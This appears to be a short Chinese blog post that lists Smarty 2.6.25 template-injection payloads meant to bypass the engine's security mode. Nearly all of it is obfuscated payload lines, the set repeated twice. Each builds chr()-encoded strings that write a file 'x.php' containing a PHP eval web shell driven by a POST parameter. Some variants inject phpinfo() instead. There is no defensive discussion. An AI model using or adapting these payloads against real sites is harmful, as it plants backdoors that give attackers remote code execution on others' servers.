在开启security选项关闭了php等直接执行代码的标签后的一些可用方法,测试版本Smarty version 2.6.25。
<{capture name={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>z<{/capture}>
<{section name={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>z<{/section}>
<{foreach from=1 item=x key="']);phpinfo();//"}>
<{insert name=x toby={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>
<{assign var={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}} value=x}>
<{rewrite a={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}
<{include file="{${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}"}>
<{include_php file="x" assign="1'.fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62)),'"}><{capture name={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>z<{/capture}>
<{section name={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>z<{/section}>
<{foreach from=1 item=x key="']);phpinfo();//"}>
<{insert name=x toby={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>
<{assign var={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}} value=x}>
<{rewrite a={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}
http://hi.baidu.com/toby57/blog/item/8acaaf0fbeedd7fcab6457e9.html
